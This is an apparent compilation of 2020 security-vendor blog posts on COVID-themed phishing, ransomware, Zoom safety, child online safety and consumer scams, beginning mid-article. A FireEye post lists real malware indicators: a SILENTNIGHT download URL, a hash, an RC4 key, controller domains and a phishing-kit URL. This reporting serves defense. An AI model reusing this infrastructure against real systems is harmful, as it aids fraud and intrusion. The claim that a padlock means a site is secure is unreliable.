Kaspersky went on to find tens of other, similar spyware apps dating back to 2015 that Google had already removed from its Play Store, but which were still visible in archived mirrors of the app repository. Those apps appeared to have a Vietnamese focus, offering tools for finding nearby churches in Vietnam and Vietnamese-language news. In every case, Firsh says, the hackers had created a new account and even Github repositories for spoofed developers to make the apps appear legitimate and hide their tracks.

Cyber News Rundown: Hackers Aim at Oil Producers

Reading Time: ~ 2 min.

As Oil Prices Drop, Hackers Take Aim at Producers

With the recent crash in oil prices, and supply rapidly piling up, a new spear phishing campaign has begun targeting executives at several major oil producers. A massive number of emails started being distributed in late March, without the telltale signs of amateur phishing like bad spelling and grammar. Furthermore, the emails appeared to be from a sender with knowledge of the oil and gas industry. Two documents within the emails posed as bid contracts and proposal forms but were used to deliver the final payload, a trojan called Agent Tesla, which is a malware-as-a-service that can perform a variety of malicious activities on a system.

Software Affiliates Sending Phony Expiration Notices

Several dubious third-party software affiliates have been spotted distributing a campaign targeting antivirus users, prompting them to renew their subscription through the affiliate’s link, thus netting them additional revenue. Most affiliate programs have strict guidelines as to how the company can promote the affiliated software, and purposely misleading customers can lead to major penalties. Emails displaying expiration notices for Norton and McAfee have both been identified. With a percentage commission, the affiliate could be earning up to 20% of the purchase price for each fraudulent sale.

Philadelphia Sandwich Chain Faces Data Breach

PrimoHoagies, a Philadelphia-based sandwich chain, was the unsuspecting victim to a data breach that went undetected from July 2019 until this February. The breach affected all online sales during that time period, though no in-store purchase data was compromised. By April, the company released an official statement regarding the breach. But the admission came only days before a data security lawsuit was filed by a customer who had seen fraudulent charges on his credit card.

Decryption Keys for Shade Ransomware Made Available

After nearly five years of operation, the creators of Shade ransomware have decided to close shop and give out nearly 750,000 decryption keys along with an apology for harm done. While most ransomware variants tend to purposely avoid Russia and Ukraine, Shade focused specifically on these two countries during its run. Though the many decryption keys and master keys have been made public, the instructions for recovering the actual files are not especially user-friendly and a full decryption tool has not yet been released.

ExecuPharm Hit with Ransomware Attack

One of the largest pharmaceutical companies in the U.S. recently suffered a ransomware attack that not only encrypted their systems but also gain access to a trove of highly sensitive personal information belonging to thousands of clients. It is believed that the attack started with in mid-March with phishing emails targeting specific employees with the widest access to internal systems. At this time, there is no confirmed decryption tool for the ransomware variant used and the company has begun contacting affected customers.

The post Cyber News Rundown: Hackers Aim at Oil Producers appeared first on Webroot Blog.

Phishers Increasingly Incorporating reCaptcha API into Campaigns

Security researchers observed that digital attackers are increasingly incorporating the reCaptcha API into their phishing campaigns. Barracuda Networks explained that malicious actors are starting to outfit their phishing attempts with reCaptcha walls so that they can shield their landing pages from automated URL analysis tools as well as add a sense of legitimacy to their […]… Read More

The post Phishers Increasingly Incorporating reCaptcha API into Campaigns appeared first on The State of Security.

Ransomware Attacks: Cybercriminals Pinpointing Healthcare Organizations

Cybercriminals target healthcare

No One is Invisible to Ransomware Attacks: Cybercriminals Pinpointing Healthcare Organizations 

 In this challenging time, cybercriminals have their eyes on consumers and institutions alike. Malicious groups have increased their targeting of hospitals and healthcare entities to take advantage of deepening resource strain. Many of these groups are using ransomware attacks to compromise hospital systems, locking up patient records or vaccine research until a hefty ransom is paid. The requested sum is usually a high value of Bitcoin or alternative cryptocurrencies, as these are typically more difficult to trace 

However, unlike with old tax paperwork or private family photos, the impact of losing or mass distributing patient records could literally mean life or death for those awaiting urgent care or diagnosisBad actors count on this urgency to guarantee that their ransom is met 

Be wary of old tactics with a new twist 

The tactics these cybercriminals use can be a combination of traditional phishing and vulnerability exploitationReportedly, the WHO has seen a twofold increase in phishing attacks by cybercriminals attempting to steal credentials. Some ransomware groups have stated they will avoid targeting hospitals given the current strain on healthcare systems. Still, claims from criminal organizations should be taken with a hefty grain of salt.  

Keep your security up to date 

In the meantime, McAfee Advanced Threat Research is closely monitoring new threats that aim to take advantage of the uncertainty surrounding the pandemic. The team has analyzed these threats based on geography, and will continue to report further findings. While these threats are not unexpected as cyber criminals always try to leverage large events to their advantage, it is disappointing to see at a time when the world needs to come together that there are those who have scant regard for the sense of community. 

Stay ahead of malicious threats 

Whether you’re a healthcare professionalfamily provideror both, here are some tips that can help you stay ahead of malicious tactics being used to attack individuals and healthcare institutions 

  • Secure your home network by checking your device passwords and Wi-Fi password. Make sure your system and software are all up to date, and take the time to perform pending updates.  
  • Avoid clicking on emails and texts from unknown senders. Be wary of any communication coming from “official” sources that encourage urgent actions on provided links or ask for your login credentials.  
  • Check in often with family and friends and be their technical advisor if needed to help steer them away from social engineering or spammy phishing. Consider using a free safe browser extension that can help steer you away from illegitimate sites.  
  • Be sure to set up robust security on devices that may now be seeing a lot more online time.  
  • Don’t forget your phone  stay protected from malicious apps and smishing/vishing attempts.

The post Ransomware Attacks: Cybercriminals Pinpointing Healthcare Organizations appeared first on McAfee Blogs.

How to Keep Your Video Conferencing Meetings Secure

Guest Post by By Tom Kellermann (Head Cybersecurity Strategist, VMware Carbon Black)

The sudden and dramatic shift to a mobile workforce has thrust video conferencing into the global spotlight and evolved video conferencing vendors from enterprise communication tools to critical infrastructure.

During any major (and rapid) technology adoption, cyberattackers habitually follow the masses in hopes of launching an attack that could lead to a pay day or give them a competitive advantage. This has not been lost on global organisations’ security and IT teams, who are quickly working to make sure their employees’ privacy and data remains secure.

Here are some high-level tips to help keep video conferencing secure.

Update the Application
Video conferencing providers are regularly deploying software updates to ensure that security holes are mitigated.  Take advantage of their diligence and update the app prior to using it every time.

Lock meetings down and set a strong password
Make sure that only invited attendees can join a meeting. Using full sentences with special characters included, rather than just words or numbers, can be helpful. Make sure you are not sharing the password widely, especially in public places and never on social media. Waiting room features are critical for privacy as the meeting host can serve as a final triage to make sure only invited participants are attending. Within the meeting, the host can restrict sharing privileges, leading to smoother meetings and ensuring that uninvited guests are not nefariously sharing materials. 

Discussing sensitive information
If sensitive material must be discussed, ensure that the meeting name does not suggest it is a top-secret meeting, which would make it a more attractive target for potential eavesdroppers.  Using code words to depict business topics is recommended during the cyber crime wave we are experiencing.

Restrict the sharing of sensitive files to approved file-share technologies, not as part of the meeting itself
Using an employee sharing site that only employees have access to (and has multi-factor authentication in place) is a great way to make sure sensitive files touch the right eyes only.  This should be mandated as this is a huge Achilles heel.

Use a VPN to protect network traffic while using the platform 
With so many employees working remotely, using a virtual private network (VPN) can help better secure internet connections and keep private information private via encryption. Public WiFi can be a gamble as it only takes one malicious actor to cause damage.  Do not use public WiFi, especially in airports or train stations.  Cyber criminals lurk in those locations.

If you can, utilise two networks on your home WiFi router, one for business and the other for personal use.
Make sure that your work computer is only connected to a unique network in your home. All other personal devices – including your family’s – should not be using the same network. The networks and routers in your home should be updated regularly and, again, should use a complex password. Additionally, you should be the only system administrator on your network and all devices that connect to it.

All of us have a role to play in mitigating the cyber crime wave.  Please remember these best practices the next time you connect. Stay safe online

Also related - How Safe are Video Messaging Apps such as Zoom?

Limited Shifts in the Cyber Threat Landscape Driven by COVID-19

Though COVID-19 has had enormous effects on our society and economy, its effects on the cyber threat landscape remain limited. For the most part, the same actors we have always tracked are behaving in the same manner they did prior to the crisis. There are some new challenges, but they are perceptible, and we—and our customers—are prepared to continue this fight through this period of unprecedented change.

The significant shifts in the threat landscape we are currently tracking include:

  • The sudden major increase in a remote workforce has changed the nature and vulnerability of enterprise networks.
  • Threat actors are now leveraging COVID-19 and related topics in social engineering ploys.
  • We anticipate increased collection by cyber espionage actors seeking to gather intelligence on the crisis.
  • Healthcare operations, related manufacturing, logistics, and administration organizations, as well as government offices involved in responding to the crisis are increasingly critical and vulnerable to disruptive attacks such as ransomware.
  • Information operations actors have seized on the crisis to promote narratives primarily to domestic or near-abroad audiences.

Same Actors, New Content

The same threat actors and malware families that we observed prior to the crisis are largely pursuing the same objectives as before the crisis, using many of the same tools. They are simply now leveraging the crisis as a means of social engineering. This pattern of behavior is familiar. Threat actors have always capitalized on major events and crises to entice users. Many of the actors who are now using this approach have been tracked for years.

Ultimately, COVID-19 is being adopted broadly in social engineering approaches because it is has widespread, generic appeal, and there is a genuine thirst for information on the subject that encourages users to take actions when they might otherwise have been circumspect. We have seen it used by several cyber criminal and cyber espionage actors, and in underground communities some actors have created tools to enable effective social engineering exploiting the coronavirus pandemic. Nonetheless, COVID-19 content is still only used in two percent of malicious emails.

 

For the time being, we do not believe this social engineering will be abetting. In fact, it is likely to take many forms as changes in policy, economics, and other unforeseen consequences manifest. Recently we predicted a spike in stimulus related social engineering, for example. Additionally, the FBI has recently released a press release anticipating a rise in COVID-19 related Business Email Compromise (BEC) scams.

State Actors Likely Very Busy

Given that COVID-19 is the undoubtedly the overwhelming concern of governments worldwide for the time being, we anticipated targeting of government, healthcare, biotech, and other sectors by cyber espionage actors. We have not yet observed an incident of cyber espionage targeting COVID-19 related information; however, it is often difficult to determine what information these actors are targeting. There has been at least one case reported publicly which we have not independently confirmed.

We have seen state actors, such as those from Russia, China and North Korea, leverage COVID-19 related social engineering, but given wide interest in that subject, that does not necessarily indicate targeting of COVID-19 related information.

Threat to Healthcare

Though we have no reason to believe there is a sudden, elevated threat to healthcare, the criticality of these systems has probably never been greater, and thus the risk to this sector will be elevated throughout this crisis. The threat of disruption is especially disconcerting as it could affect the ability of these organizations to provide safe and timely care. This threat extends beyond hospitals to pharmaceutical companies, as well as manufacturing, administration and logistics organizations providing vital support. Additionally, many critical public health resources lie at the state and local level.

Though there is some anecdotal evidence suggesting some ransomware actors are avoiding healthcare targets, we do not expect that all actors will practice this restraint. Additionally, an attack on state and local governments, which have been a major target of ransomware actors, could have a disruptive effect on treatment and prevention efforts.

Remote Work

The sudden and unanticipated shift of many workers to work from home status will represent an opportunity for threat actors. Organizations will be challenged to move quickly to ensure sufficient capacity, as well as that security controls and policies are in place. Disruptive situations can reduce morale and increase stress, leading to adverse behavior such as decreasing users’ reticence to open suspicious messages, and even increasing the risk of insider threats. Distractions while working at home can cause lowered vigilance in scrutinizing and avoiding suspicious content as workers struggle to balance work and home responsibilities at the same time. Furthermore, the rapid adoption of platforms will undoubtedly lead to security mistakes and attract the attention of the threat actors.

Secure remote access will likely rely on use of VPNs and user access permissions and authentication procedures intended to limit exposure of proprietary data. Hardware and infrastructure protection should include ensuring full disk encryption on enterprise devices, maintaining visibility on devices through an endpoint security tool, and maintaining regular software updates. 

For more on this issue, see our blog post on the risks associated with remote connectivity.

The Information Operations Threat

We have seen information operations actors promote narratives associated with COVID-19 to manipulate primarily domestic or near-abroad audiences. We observed accounts in Chinese-language networks operating in support of the People's Republic of China (PRC), some of which we previously identified to be promoting messaging pertaining to the Hong Kong protests, shift their focus to praising the PRC's response to the COVID-19 outbreak, criticizing the response of Hong Kong medical workers and the U.S. to the pandemic, and covertly promoting a conspiracy theory that the U.S. was responsible for the outbreak of the coronavirus in Wuhan.

We have also identified multiple information operations promoting COVID-19-related narratives that were aimed at Russian- and Ukrainian-speaking audiences, including some that we assess with high confidence are part of the broader suspected Russian influence campaign publicly referred to as "Secondary Infektion," as well as other suspected Russian activity. These operations have included leveraging a false hacktivist persona to spread the conspiracy theory that the U.S. developed the coronavirus in a weapons laboratory in Central Asia, taking advantage of physical protests in Ukraine to push the narrative that Ukrainians repatriated from Wuhan will infect the broader Ukrainian population, and claiming that the Ukrainian healthcare system is ill-equipped to deal with the pandemic. Other operations alleged that U.S. government or military personnel were responsible for outbreaks of the coronavirus in various countries including Lithuania and Ukraine, or insisted that U.S. personnel would contribute to the pandemic's spread if scheduled multilateral military exercises in the region were to continue as planned.

Outlook

It is clear that adversaries expect us to be distracted by these overwhelming events. The greatest cyber security challenge posed by COVID-19 may be our ability to stay focused on the threats that matter most. An honest assessment of the cyber security implications of the pandemic will be necessary to make efficient use of resources limited by the crisis itself.

For more information and resources that can help strengthen defenses, visit FireEye's "Managing Through Change and Crisis" site, which aggregates many resources to help organizations that are trying to navigate COVID-19 related security challenges.

Internet Safety for Kids: A Refresher for Homebound Families

internet safety for kids

Editor’s Note: This is part II of our internet safety for kids series. Part I focuses on younger children and can be read here.

Parents have always been concerned about keeping their kids safe online — especially their tweens and teens. That conversation is even more critical with parents and kids now working and learning at home. But as the days turn into weeks, the line between safe and risky digital behavior may get a little blurry. Maybe we can help by refreshing some basics.

Why is internet safety for kids important?

There’s no way around it. Young and old, over time, we’ve tethered nearly every aspect of our lives to the digital realm. If we want to work, bank, shop, pay bills, or connect with family and friends, we have to plugin. A wired life makes internet safety not just important, but mission-critical for parents.

Kids go online for school, to be entertained, and to connect with friends; only they don’t have the emotional maturity or critical thinking skills to process everything they will encounter on the other side of their screens.

That’s where proactive digital parenting comes in.

If our parenting goal is to raise wise, responsible, caring adults, equipped for real life, that goal must also include helping them safeguard their emotional and physical health from online risk. There’s no such thing as a digital platform or product that is 100% safe. So, our best strategy is to learn and pass on skills that mitigate that risk.

What are the dangers of the internet?

Any danger that exists offline is potentially multiplied when we log online due to the vast access the web affords each one of us. In a few clicks, we can unlock a world of possibilities. The flip side? There’s an ever-present battalion of crooks and bullies out to exploit that access. Online we will encounter the best and the worst of humankind. The daily threats to children include bullying, inappropriate content, predators, and the loss of privacy. Add to that list, digital viruses and malware, phishing scams, sharing regrettable content, and gaming addiction.

How can homebound kids avoid digital risk?

So what can we do to ensure the weeks ahead don’t bring more digital risk into our homes? We start by having consistent, candid conversations with our kids about online safety (even if eye-rolling begins). Truth: Your family’s cybersecurity is as strong as the weakest security link in your family. If one family member is lax about internet safety, your entire family’s security is compromised.

So let’s get started with some internet safety basics to share with your tweens and teens. To read internet safety guidelines for younger children, click here.

11 Internet Safety Basics for Homebound Teens

internet safety for kids

  1. Get candid about content. Your tweens and teens have likely come across inappropriate material online. You can minimize further exposure by discussing expectations and family values around acceptable content — both sharing it and receiving it. Reminder: “Vanishing” Snapchats and deleted content can be easily captured in a screenshot — nothing shared online is private. For extra monitoring muscle, consider adding a parental control software to your family’s internet safety plan.
  2. Keep passwords, software, apps updated. Being homebound gives us all extra time for details. Go through personal and family devices and update all passwords. Keeping device software and apps updated also protects kids from outside risk.
  3. Balance life and tech. Kids can lose their entire day surfing, scrolling, and watching YouTube or TikTok videos. Establish screen limits help kids grow healthy tech habits. Consider scheduling device breaks, no phone zones (dinner table, movie time, bedtime), and installing software that features time limits.
  4. Be a leader online. Yoda was on target — with much power comes much responsibility. Many online dangers can be diminished by consistently teaching kids to be upstanders online. Practicing empathy, respect, tolerance, and compassion makes the digital world safer for everyone.
  5. Address peer pressure. Kids with devices can share unwise, personal photos with friends they trust. When friendships end, however, those photos can be shared or used for bullying or extortion. Discuss digital peer pressure with your child and how to respond.
  6. Look out for scams. Talk frequently about the many forms scams can take, such as phishing, malware, catfishing, fake news, and clickbait.
  7. Don’t friend strangers. Sexual predators create fake social media accounts specifically to befriend kids. In turn, kids share personal info, daily plans, location, and may even agree to meet in person with online friends. Discuss these risky scenarios and other manipulation tactics of predators with your child. Be aware of his or her friend circles, and look for chat apps such as WhatsApp or Kik.
  8. Maximize privacy on social profiles. Help kids maximize privacy settings on social profiles and delete any profile or post information that unintentionally gives away personal data. Consider removing the names of family members, pets, school, hometown, and birthdays. Hackers can piece together this information to crack passwords or create authentic-looking phishing scams.
  9. Consider a family VPN. Virtual Private Networks are becoming the most popular way to conduct business, shop, and safeguard a family’s online activity from outsiders. VPN encryption can protect a child against several virtual threats.
  10. Review gaming safety. If your kids spend a lot of time on games like Fortnite and Call of Duty, they can encounter strangers, bullying, and scams that target gamers. Teen gamers should use a firewall to help block would-be attackers from gaining access to their PC and home networks and as well as a comprehensive security solution to protect devices from malware and other threats.
  11. Monitor devices. Consider spot-checking all devices routinely. Review privacy settings on social networks (kids change them), look for new apps, review browsing history, chats, and texts. Need to go a step farther? Keep your child’s phone for a few hours to check notifications that pop up. You may find activity that wasn’t necessarily visible otherwise.

Taming all the moving parts of internet safety isn’t easy, and balancing your relationship with your child and parental monitoring can get turbulent at times. While kids can experience more drama and anxiety by going online, social networks remain critical channels for affirmation, self-expression, and connection. In the weeks to come, take time to listen, learn, and get to know your child’s digital passions and patterns. Identify safety gaps and reinforce those areas. Good luck, parents, you’ve got this!

The post Internet Safety for Kids: A Refresher for Homebound Families appeared first on McAfee Blogs.

How Safe are Video Messaging Apps such as Zoom?

I was privileged to be part of The Telegraph Coronavirus Podcast today, where I was asked about the security of video messaging apps.



'How safe are video messaging apps such as Zoom, and what should users bear in mind when using them?'

My reply...
Video messaging apps are an essential communication tool for at home and within businesses, especially during the COVID-19 lockdown period. They are generally safe to use but there are a few security risks which users should be aware of.

Our increased use of video messaging apps has not gone unnoticed by cybercriminals, who are seeking to exploit the increase of use by sending phishing emails, social media scam messages and even scam text messages, with fake invitations to video messaging app meetings.

Typically, these scam messages will entice you into either opening a malicious attachment or click a web link which directs to a malicious website. The ultimate aim of these cyberattacks is to deliver malicious software, such as ransomware which locks your PC and demands a ransom payment to unlock, scam a payment, or steal your personal information which can be resold to other cybercriminals on the dark web.

So, never open an attachment or click on any links within any unexpected or suspicious emails, social media messages and text messages.

The next piece of advice is to ensure your video messaging app is always kept up-to-date. Luckily most modern smartphones and computer operating systems will automatically update your apps, but it is always worth double-checking and not to suppress any app updates from occurring, as often the app updates are fixing security flaws.

And finally, on home computers and laptops, when not using video messaging apps, either cover your webcam with a piece of tape or face your webcam towards a wall or ceiling, just in case your computer is covertly compromised and a malicious actor gains access to your computer's webcam.


Additional
One tip I didn't have time to say on the podcast, is always ensure your video chats are set to private, using a strong password to prevent ZoomBombingRecent reportshave shown a series of “Zoombombing” incidents lately, where unwanted guests have joined in on open calls. 

Bharat Mistry, Principal Security Strategist at Trend Micro on Zoom advises “Although not alone in being targeted, Zoom has been the subject of some of the highest-profile incidents so far this year. Fortunately, there are things you can do to keep your business safe.

It’s all about taking advantage of unsecure settings in the app, (and possibly using brute-force tools to crack meeting IDs). With access to a meeting, hackers could harvest highly sensitive and/or market-critical corporate information, or even spread malware via a file transfer feature.

Hackers know users are looking en masse for ways to communicate during government lockdowns. By creating legitimate-looking Zoom links and websites, they could steal financial details, spread malware or harvest Zoom ID numbers, allowing them to infiltrate virtual meetings. One vendor discovered 2,000 new domains had been registered in March alone, over two-thirds of the total for the year so far.

Risk mitigation:
The good news is that there are several things you can do to mitigate the security risks associated with Zoom. The most basic are: 
  • Ensure Zoom is always on the latest software version
  • Build awareness of Zoom phishing scams into user training programmes. Users should only download the Zoom client from a trusted site and check for anything suspicious in the meeting URL when joining a meeting
  • Ensure all home workers have anti-malware including phishing detection installed from a reputable vendor
Organisational preparedness:
Next, it’s important to revisit those administrative settings in the app, to reduce the opportunities for hackers and Zoombombers. Fortunately, automatically generated passwords are now switched on by default, and the use of personal meeting IDs are switched off, meaning Zoom will create a random, one-off ID for each meeting. These setting should be kept as is. But organisations can do more, including:
  • Ensure you also generate a meeting ID automatically for recurring meetings
  • Set screen-sharing to “host only” to prevent uninvited guests from sharing disruptive content
  • Don’t share any meeting IDs online
  • Disable “file transfers” to mitigate risk of malware
  • Make sure that only authenticated users can join meetings
  • Lock the meeting once it’s started to prevent anyone new joining
  • Use waiting room feature, so the host can only allow attendees from a pre-assigned register
  • Play a sound when someone enters or leaves the room
  • Allow host to put attendees on hold, temporarily removing them from a meeting if necessary”

Social Engineering Based on Stimulus Bill and COVID-19 Financial Compensation Schemes Expected to Grow in Coming Weeks

Given the community interest and media coverage surrounding the economic stimulus bill currently being considered by the United States House of Representatives, we anticipate attackers will increasingly leverage lures tailored to the new stimulus bill and related recovery efforts such as stimulus checks, unemployment compensation and small business loans. Although campaigns employing themes relevant to these matters are only beginning to be adopted by threat actors, we expect future campaigns—primarily those perpetrated by financially motivated threat actors—to incorporate these themes in proportion to the media’s coverage of these topics.

Threat actors with varying motivations are actively exploiting the current pandemic and public fear of the coronavirus and COVID-19. This is consistent with our expectations; malicious actors are typically quick to adapt their social engineering lures to exploit major flashpoints along with other recurrent events (e.g. holidays, Olympics). Security researchers at FireEye and in the broader community have already begun to identify and report on COVID-19 themed campaigns with grant, payment, or economic recovered themed emails and attachments.

Example Malware Distribution Campaign

On March 18, individuals at corporations across a broad set of industries and geographies received emails with the subject line “COVID-19 Payment” intended to distribute the SILENTNIGHT banking malware (also referred to by others as Zloader). Despite the campaign’s broad distribution, a plurality of associated messages were sent to organizations based in Canada. Interestingly, although the content of these emails was somewhat generic, they were sometimes customized to reference a payment made in currency relevant to the recipient’s geography and contextually relevant government officials (Figure 1 and Figure 2). These emails were sent from a large pool of different @gmx.com email addresses and had password protected Microsoft Word document attachments using the file name “COVID 19 Relief.doc” (Figure 3). The emails appear to be auto generated and follow the format <name>.<name><SevenNumberString>@gmx.com. When these documents were opened and macros enabled, they would drop and execute a .JSE script crafted to download and execute an instance of SILENTNIGHT from http://209.141.54[.]161/crypt18.dll.

An analyzed sample of SILENTNIGHT downloaded from this URL had an MD5 hash of 9e616a1757cf1d40689f34d867dd742e, employed the RC4 key 'q23Cud3xsNf3', and was associated with the SILENTNIGHT botnet 'PLSPAM'. This botnet has been seen loading configuration files containing primarily U.S.- and Canada financial institution webinject targets. Furthermore, this sample was configured to connect to the following controller infrastructure:

  • http://marchadvertisingnetwork4[.]com/post.php
  • http://marchadvertisingnetwork5[.]com/post.php
  • http://marchadvertisingnetwork6[.]com/post.php
  • http://marchadvertisingnetwork7[.]com/post.php
  • http://marchadvertisingnetwork8[.]com/post.php
  • http://marchadvertisingnetwork9[.]com/post.php
  • http://marchadvertisingnetwork10[.]com/post.php


Figure 1: Example lure using CAD


Figure 2: Example lure using AUD


Figure 3: Malicious Word document

Example Phishing Campaign

Individuals at financial services organizations in the United States were sent emails with the subject line “Internal Guidance for Businesses Grant and loans in response to respond to COVID-19” (Figure 4). These emails had OpenDocument Presentation (.ODP) format attachments that, when opened in Microsoft PowerPoint or OpenOffice Impress, display a U.S. Small Business Administration (SBA) themed message (Figure 5) and an in-line link that redirects to an Office 365 phishing kit (Figure 6) hosted at https://tyuy56df-kind-giraffe-ok.mybluemix[.]net/.


Figure 4: Email lure referencing business grants and loans


Figure 5: SBA-themed message


Figure 6: Office 365 phishing page

Implications

Malicious actors have always exploited users’ sense of urgency, fear, goodwill and mistrust to enhance their operations. The threat actors exploiting this crisis are not new, they are simply taking advantage of a particularly overtaxed target set that is urgently seeking new information. Users who are aware of this dynamic, and who approach any new information with cautious skepticism will be especially prepared to meet this challenge.

Scams Facing Consumers in the New Digital WFH Landscape

With many people having their normal day to day life turned upside down, scammers are capitalizing on consumers’ newfound lifestyles to make a financial gain or wreak havoc on users’ devicesLet’s take a look at the most recent threats that have emerged as a result of the pandemic 

Fraudulent Relief Checks

On Wednesday March 25, the Senate passed a relief bill that contains a substantial increase in unemployment benefits for Americans who have lost their jobs or have been furloughed due to the economic fallout from the pandemicFinancial scammers are likely to use this as an opportunity to steal money offered to Americans who are facing the negative economic effects of the pandemic, as these crooks could make consumers believe they need to pay money as a condition of receiving government relief. The Federal Trade Commission issued a warning to consumers to be on the lookout for fraudulent activity as the government implements these financial relief packages.  

Map Used to Track Pandemic Used to Spread Malware

According to security researcher Brian Krebs, criminals have started disseminating real-time, accurate information about global infection rates to spread malware. In one scheme, an interactive dashboard created by Johns Hopkins University is being used in malicious websites (and possibly in spam emails) to spread password-stealing malware.  Additionally, Krebs flagged a digital pandemic infection kit, which allows other criminals to purchase a bundled version of the map with the scammer’s preferred attack method. 

Texts, WhatsApp, and TikTok Spread Falsehoods

Due to the nature of the rapidly evolving pandemic, criminals are taking advantage of the situation by spreading misinformation. As more communities are being ordered to shelter in placemisleading text messages announcing a national quarantine claiming to come from the White House buzzed onto cell phones around the U.S. According to the Washington Post, the fraudulent text messages encouraged users to, “Stock up on whatever you guys need to make sure you have a two-week supply of everything. Please forward to your network.” These fake texts spread so widely that the White House’s National Security Council debunked the misleading claims in a Twitter post stating, “Text message rumors of a national #quarantine are FAKE. There is no national lockdown.” Communication apps like WhatsApp and social media platforms like TikTok have carried similar examples of this misinformation.  

Robocalls Offering Free Test Kits and Low-Cost Health Insurance

On top of fraudulent messages floating around via SMS, WhatsApp, and TikTok, scammers are also using robocalls to spread misinformation around the global pandemic, especially as more users are at home and available to answer phone calls as a result of self-isolation. According to CNNrobocalls from more than 60 different phone numbers are falsely offering low-priced health insurance and free coronavirus test kitsAnother type of robocall asks users to sign a petition to ban flights from China. Criminals are taking advantage of the fact that new information around the pandemic is constantly being released, presenting them with an opportunity to scam users by impersonating local and federal officials.  

Stay Safe Online With These Tips

During this time of uncertainty, it can be difficult to decipher what is fact from fiction. When it comes to the potential online threats around the recent pandemic, here’s what you can do to stay protected:  

Only trust official news sources

Be sure to only trust reputable news sites. This will help you filter out fake information that is just adding to the noise across the internet.  

Don’t share your personal or financial data

Although financial relief checks are not yet a reality, know that the federal government will not ask you to pay fees or charges upfront to receive these funds. Additionally, the government will not ask you for your Social Security number, bank account, or credit card number.  

Beware of messages from unknown users

If you receive a text, email, social media message, or phone call from an unknown user regarding the pandemic, it’s best to proceed with caution and avoid interacting with the message altogether.  

Go directly to the source

If you receive information regarding the pandemic from an unknown user, go directly to the source instead of clicking on links within messages or attachments. For example, users should only trust the map tracking the pandemic’s spread found on the Johns Hopkins websiteUsing a tool like McAfee WebAdvisor can help users stay safe from similar threats while searching the web.  

Register for the FCC’s “Do Not Call” list

This can help keep you protected from scammers looking to capitalize on current events by keeping your number off their lists. 

Stay updated 

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post Scams Facing Consumers in the New Digital WFH Landscape appeared first on McAfee Blogs.

Coronavirus Cybersecurity: Scams To Watch Out For

The Coronavirus pandemic has shocked the world in recent months, with many countries being forced to go into lockdown or encourage its nationals to self-isolate as much as possible. Many are trying to work out how to juggle working from home, caring for their children, managing their finances and looking after their health! But sadly, there’s one more thing you need to add to that list - staying safe online and watching out for scammers. 

That’s because cybercriminals have decided to take advantage of the global fear, confusion and uncertainty around the world. Plus, vast numbers of people are now working from home and this usually means they are doing so with less cybersecurity measures in place than they would have in their office. 

Malicious messages examples seen
  • email and social media messages impersonating medical expert bodies including the NHS, World Health Organization (WHO), and Centre for Disease and Control (CDC), requesting a donation to research a vaccine.
  • GOV.UK themed text messages titled 'You are eligible to get a tax refund (rebate) of 128.34 GBP
  • messages advertising protective masks and hand sanitisers from bogus websites
So, despite this being a time when we all need to pull together and help one another out, there are still scammers out there looking to cause trouble. To help keep you safe online, Evalian has compiled a list of four of the most common Coronavirus scams happening right now, so you know what to look out for. 

1. Phishing Scams 
This is perhaps the biggest scam out there right now because phishing emails can come in many different forms. Most commonly, hackers are pretending to be health officials or national authorities offering advice about staying safe during the Corona outbreak. The reality is that they are trying to trick unsuspecting individuals into downloading harmful malware or providing sensitive, personal information. 

Some of these phishing emails look really sophisticated, with one in particular being a fake email sent from the World Health Organisation (WHO), offering tips on how to avoid falling ill with the virus. Once the email user clicks on the link provided, they are redirected to a site that steals their personal information. The problem is, with so many people being genuinely worried about their health and hoping to stop the spread, many don’t suspect that these types of emails could be a scam. 

The best way to avoid falling victim to these types of phishing emails is to look for suspicious email addresses or lots of spelling mistakes. And even if the email looks pretty legitimate, it might still be worth going direct to the sender’s website instead. For example, going direct to the World Health Organisation website for advice means you can avoid clicking any links from the email. That way you can find the information you need and reduce the risk of falling victim to a cybercrime. 

Secondly, if an email asks for money or bitcoin donations to help tackle Coronavirus, don’t make any transfers. Again, if you wish to help by donating money or services, go directly to the websites of charities or health organisations to see how you can help.

It’s also worth noting, that these phishing scams can also be received as a text message or phone call. If you receive strange texts or voicemails asking for donations, giving offers on vaccines or warning you about cases in your local area, approach with caution and certainly don’t give away any of your personal details. 

2. Fake Websites
Another common scam designed to play on fear and uncertainty is the setting up of fake websites. Cybercriminals are creating Coronavirus-related websites which claim to offer pharmaceuticals or remedies for the virus such as testing kits, vaccines, and other fake health solutions. The idea is to get anxious victims to part with their bank details or to hack their computer and install malware on their systems. 

In these situations, there are some things you can do. Firstly, check if the website has a secure connection. You’ll know whether it does or doesn't by the padlock in the search bar. If there is a padlock in the search bar this means the site is secure, if there isn't, then it’s a good idea to avoid this site. Not only this but if the website is poorly designed and the text has a lot of spelling and grammatical errors, this could also be a big red flag. 

Finally, it’s also important to be aware that not many sites are genuinely going to be offering these health solutions and if they appear to be selling in-demand products at an extremely low price, then it’s most likely a scam. Remember, if it seems to good to be true then it probably is. 

3. App Scams 
Cybercriminals are also targeting smartphones and mobile devices with dedicated Coronavirus apps. These apps claim to track the spread of the virus in your local area and with many people concerned about the proximity of the virus to their home, it’s not surprising that people are willing to download such an app. 

The reality, however, is that the app then installs malware into your device and not only comprises your tech, but also all the personal information stored within it. In some cases, the app can lock victims out of their phone or tablet demanding a ransom to get back in, threatening to delete all the information, contact details and photos stored inside.

4. Fake Coronavirus Maps
Last but not least, the fake Coronavirus map scam. Similar to that of the tracking app, cybercriminals have begun circulating graphics of fake maps on which they claim to highlight where all the Coronavirus cases are in your country. These are usually sent round on social media and through email. 

Of course, these images are not meant to educate or help you in any way. In fact, the scammers include malware in the links so that once you’ve clicked to open the image this immediately infects your device. In most cases, this has been reported to be the kind of bug that can steal data such as bank details, passwords, login information and other sensitive data stored on your device. 

Look for the Red Flags 
  • Never open attachments or click on links within suspicious or unexpected emails, text and social media messages
  • Look for the suspicious signs; does the message convey a sense of urgency to perform an action?
  • Always remember legitimate organisations never ask for passwords, payment card details and sensitive data to be sent by email
In these troubling and uncertain times, you’d be forgiven for falling for a scam if you thought for one second it could help to keep you and your family safe from this virus. But sadly, there are criminals out there taking advantage of people’s anxiety. So just be aware that these scams are happening and look out for the red flags we’ve mentioned above to help you stay safe online. 

Is WhatsApp Safe for Kids? Here’s What Parents Need to Know

WhatsApp Web

